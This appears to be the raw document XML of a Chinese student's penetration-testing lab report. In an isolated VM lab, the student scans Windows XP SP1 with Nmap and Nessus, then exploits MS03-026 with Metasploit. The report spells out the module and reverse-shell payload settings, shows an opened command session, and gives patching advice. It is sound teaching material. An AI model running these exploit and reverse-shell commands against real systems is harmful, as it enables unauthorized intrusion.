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六</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：渗透测试实验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</w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>姓名：安孟喆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080D76C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>学号：3024244059</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502B9C0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9D71CF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23EED9B3">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="160" w:after="120"/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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E618464">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目标主机为 Windows XP Professional SP1 32 位系统，IP 地址为 192.168.133.130；测试主机为 Ubuntu 24.04.4 LTS x86-64，Host-only 网卡地址为 192.168.133.128。测试主机安装 Nmap 7.94SVN、Nessus Essentials 10.12.0 和 Metasploit Framework 6.4.135-dev。两台虚拟机通过 VMware Host-only 网络连接，Windows XP 不接入互联网，以保证实验过程与外部网络隔离。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06D1CB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8335562">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="160" w:after="120"/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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424DF75">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/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理解渗透测试的定义和主要步骤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951D334">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/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了解漏洞扫描。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D22165">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="80"/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了解渗透测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396FA489">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="160" w:after="120"/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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="100" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（一）搭建隔离实验环境并确认目标系统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首先在 VMware 中搭建 Windows XP SP1 目标机和 Ubuntu 测试机。Ubuntu 使用两块网卡，其中 NAT 网卡用于下载安装扫描器插件，Host-only 网卡用于与目标机通信；Windows XP 只连接 Host-only 网络。这样既能保证测试机正常使用 Nessus，又能避免存在已知漏洞的旧版 Windows XP 暴露在校园网或互联网中。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在 Windows XP 中运行 winver，确认系统版本为 Windows XP Professional Service Pack 1。随后使用 ipconfig 查看目标机地址，得到 192.168.133.130；Ubuntu 的 Host-only 网卡地址为 192.168.133.128，两者位于 192.168.133.0/24 网段。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454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94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5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图1  Windows XP Professional SP1 版本信息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4578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9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57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图2  Windows XP 目标机网络地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="100" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（二）检查 RPC 服务并进行端口探测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MS03-026 漏洞位于 Windows RPC/DCOM 接口中，因此在漏洞扫描和验证之前，需要确认 RPC 服务处于运行状态并且相关端口可以从测试机访问。在 Windows XP 中使用 sc query RpcSs 检查 Remote Procedure Call 服务，结果显示 STATE 为 RUNNING。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sc query RpcSs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随后使用 netstat 检查 TCP 135 端口，结果显示 0.0.0.0:135 处于 LISTENING 状态，说明 RPC Endpoint Mapper 正在对外提供服务。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netstat -an | find ":135"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29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9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图3  Windows XP 的 RpcSs 服务运行状态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927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9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图4  Windows XP 的 TCP 135 端口监听状态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在 Ubuntu 中首先使用 ping 验证主机连通性，再使用 Nmap 对 135、139、445 端口进行服务识别。扫描结果显示三个端口均为 open，其中 135/tcp 为 Microsoft Windows RPC 服务，139/tcp 和 445/tcp 为 Windows 文件共享相关服务，说明测试主机能够访问目标机的 RPC/DCOM 服务。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ping -c 4 192.168.133.130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nmap -Pn -sV -p 135,139,445 192.168.133.130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570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9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图5  Ubuntu 对目标主机进行连通性和端口探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="100" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（三）使用 Nessus 进行漏洞扫描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在 Nessus Essentials 中新建 Advanced Scan，扫描目标设置为 192.168.133.130。Nessus 通过端口探测、服务识别和漏洞插件检测，分析目标系统的版本、开放服务及其已知漏洞。扫描完成后，目标机被识别为 Windows XP，并发现多项高危和严重漏洞。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在漏洞列表中定位到插件 11808：MS03-026 Microsoft RPC Interface Buffer Overrun，风险等级为 Critical，CVSS 评分为 10.0。该结果表明目标机未安装 MS03-026 对应安全补丁，RPC 接口存在可被远程触发的缓冲区溢出风险。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355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0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5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图6  Nessus 对 Windows XP SP1 的漏洞扫描结果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82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0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82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图7  Nessus 检测到 MS03-026 严重漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="100" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（四）使用 Metasploit 配置漏洞验证模块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在 Metasploit Framework 中使用 search ms03_026 查找对应漏洞模块，得到 exploit/windows/dcerpc/ms03_026_dcom。该模块用于向 Windows RPC/DCOM 接口发送特制请求，以验证 MS03-026 缓冲区溢出漏洞是否可以被利用。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search ms03_026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use exploit/windows/dcerpc/ms03_026_dcom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14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0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图8  在 Metasploit 中查找 MS03-026 利用模块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模块参数中，RHOSTS 表示目标主机地址，RPORT 表示目标 RPC 服务端口；LHOST 表示测试主机用于接收反向连接的地址，LPORT 表示监听端口。本实验将 RHOSTS 设置为 192.168.133.130，将 RPORT 设置为 135，选择 windows/shell/reverse_tcp 作为载荷，并将 LHOST 设置为 Ubuntu 的 Host-only 地址 192.168.133.128，LPORT 设置为 4444。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set RHOSTS 192.168.133.130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set RPORT 135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set payload windows/shell/reverse_tcp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set LHOST 192.168.133.128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set LPORT 4444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show options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968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0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9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图9  MS03-026 模块、目标与反向连接参数配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="100" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（五）执行漏洞验证并确认远程会话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执行 check 时，模块提示检测到 DCOM 服务，但无法仅通过检查例程完全验证漏洞。该提示并不等同于目标安全，只说明 check 方法的判定能力有限。随后执行 exploit，Metasploit 在 192.168.133.128:4444 启动反向 TCP 监听器，并向目标机的 135 端口发送利用请求和命令行载荷。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check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exploit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终端显示 Command shell session 1 opened，说明目标机成功回连测试主机，漏洞利用验证成功。反向 Shell 的工作方式是测试机先监听指定端口，目标机在漏洞被触发后主动连接 LHOST:LPORT，从而使测试人员获得目标系统的命令行会话。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707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04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0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图10  利用 MS03-026 成功建立反向命令行会话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在获得的会话中执行 ver、hostname 和 ipconfig 等无破坏性命令。输出显示目标系统为 Microsoft Windows XP 5.1.2600，目标主机 IP 为 192.168.133.130，与 Nessus 扫描目标一致，进一步证明当前会话来自实验目标机。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ver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hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="480" w:right="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ipconfig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437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0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43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sz w:val="21"/>
        </w:rPr>
        <w:t>图11  在远程会话中验证目标系统与网络信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="100" w:line="300" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（六）实验结果与安全加固建议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本实验完成了从目标识别、端口探测、漏洞扫描、漏洞分析到漏洞验证的完整渗透测试流程。Nessus 成功发现 Windows XP SP1 上的 MS03-026 漏洞，Metasploit 进一步证明该漏洞能够被实际利用，并获得目标主机命令行会话。扫描结果与利用结果相互印证，说明仅依赖版本信息或端口开放情况不能准确判断风险，必须结合漏洞检测和受控验证进行分析。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针对该漏洞，应安装微软发布的 MS03-026 安全补丁或升级到仍受支持的操作系统；在边界防火墙和主机防火墙中限制外部访问 TCP 135、139、445 等高风险端口；对旧系统进行网络隔离和最小权限管理；定期使用漏洞扫描工具检查补丁状态，并对高危漏洞及时进行修复和复测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>四．心得体会</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="312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通过本次实验，我对渗透测试的基本过程有了更直观的理解。实际操作不是直接运行漏洞利用程序，而是先确认系统版本和网络环境，再检查服务状态、扫描端口、使用 Nessus 定位漏洞，最后才用 Metasploit 进行受控验证。每一步都为下一步提供依据，可以减少误判和不必要的风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="312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</w:rPr>
        <w:t>实验过程中最关键的是正确区分目标地址和回连地址。RHOSTS 指向 Windows XP，LHOST 必须选择 Ubuntu 与 XP 同一 Host-only 网段的地址；如果错误选择 NAT 地址，目标机就无法建立反向连接。另外，Nessus 的扫描结果只能说明目标可能存在漏洞，Metasploit 成功建立会话才进一步证明漏洞具有实际可利用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>本实验也让我认识到旧系统和未修补漏洞的危害。安全维护必须重视补丁更新、端口访问控制、网络隔离和定期扫描。今后的实验中，我会在授权、隔离和可恢复的环境中进行测试，并在验证后及时恢复快照。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1BC0B68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41BC0B6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142558"/>
    <w:rsid w:val="00280C95"/>
    <w:rsid w:val="002B56B6"/>
    <w:rsid w:val="005B4EAE"/>
    <w:rsid w:val="006447DF"/>
    <w:rsid w:val="007033D5"/>
    <w:rsid w:val="008B1382"/>
    <w:rsid w:val="009550F6"/>
    <w:rsid w:val="00AA23ED"/>
    <w:rsid w:val="00C27AB5"/>
    <w:rsid w:val="00CD122D"/>
    <w:rsid w:val="00D52830"/>
    <w:rsid w:val="0D23104C"/>
    <w:rsid w:val="F1CF9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18"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="2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</Words>
  <Characters>155</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>95</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>156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2023-11-13T20:20:00Z</dcterms:created>
  <dc:creator>安孟喆</dc:creator>
  <cp:lastModifiedBy>Caroline</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-29T05:59:42Z</dcterms:modified>
  <cp:revision>8</cp:revision>
  <dc:title>实验六：渗透测试实验报告</dc:title>
  <dc:subject>软件安全实验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15DAFC129997CA998E776667CBF80F93_42</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYzdiNjc0NzQ1NjBhZWRiOGQ1ZDlmN2M1YTY3M2E3ZDgiLCJ1c2VySWQiOiIyMDU3NDkxODcifQ==</vt:lpwstr>
  </property>
</Properties>
</file>